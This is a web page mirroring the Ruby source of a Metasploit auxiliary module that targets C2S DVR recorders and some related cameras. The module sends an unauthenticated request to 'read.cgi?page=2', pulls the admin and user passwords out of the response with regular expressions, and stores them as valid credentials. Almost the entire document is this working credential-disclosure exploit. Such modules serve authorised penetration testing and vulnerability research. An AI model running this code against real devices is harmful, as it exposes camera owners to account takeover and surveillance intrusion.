CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/gather/c2s_dvr_password_disclosure.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Scanner

9
  include Msf::Auxiliary::Report

10


11
  def initialize

12
    super(

13
      'Name'         => 'C2S DVR Management Password Disclosure',

14
      'Description'  => %q{

15
        C2S DVR allows an unauthenticated user to disclose the username

16
        & password by requesting the javascript page 'read.cgi?page=2'.

17
        This may also work on some cameras including IRDOME-II-C2S, IRBOX-II-C2S.

18
      },

19
      'References'   => [['EDB', '40265']],

20
      'Author'       =>

21
        [

22
          'Yakir Wizman', # discovery

23
          'h00die',    # module

24
        ],

25
      'License'      => MSF_LICENSE,

26
      'DisclosureDate' => 'Aug 19 2016'

27
    )

28


29
    register_options([

30
      OptString.new('TARGETURI', [false, 'URL of the C2S DVR root', '/'])

31
    ])

32
  end

33


34
  def run_host(rhost)

35
    begin

36
      url = normalize_uri(datastore['TARGETURI'], 'cgi-bin', 'read.cgi')

37
      vprint_status("Attempting to load data from #{url}?page=2")

38
      res = send_request_cgi({

39
        'uri'      => url,

40
        'vars_get' => {'page'=>'2'}

41
      })

42
      unless res

43
        print_error("#{peer} Unable to connect to #{url}")

44
        return

45
      end

46


47
      unless res.body.include?('pw_enflag')

48
        print_error("Invalid response received for #{peer} for #{url}")

49
        return

50
      end

51


52
      if res.body =~ /pw_adminpw = "(.+?)";/

53
        print_good("Found: admin:#{$1}")

54
        store_valid_credential(

55
          user:         'admin',

56
          private:      $1,

57
          private_type: :password

58
        )

59
      end

60


61
      if res.body =~ /pw_userpw = "(.+?)";/

62
        print_good("Found: user:#{$1}")

63
        store_valid_credential(

64
          user:         'user',

65
          private:      $1,

66
          private_type: :password

67
        )

68
      end

69
    rescue ::Rex::ConnectionError

70
      print_error("#{peer} Unable to connect to site")

71
      return

72
    end

73
  end

74
end

75


76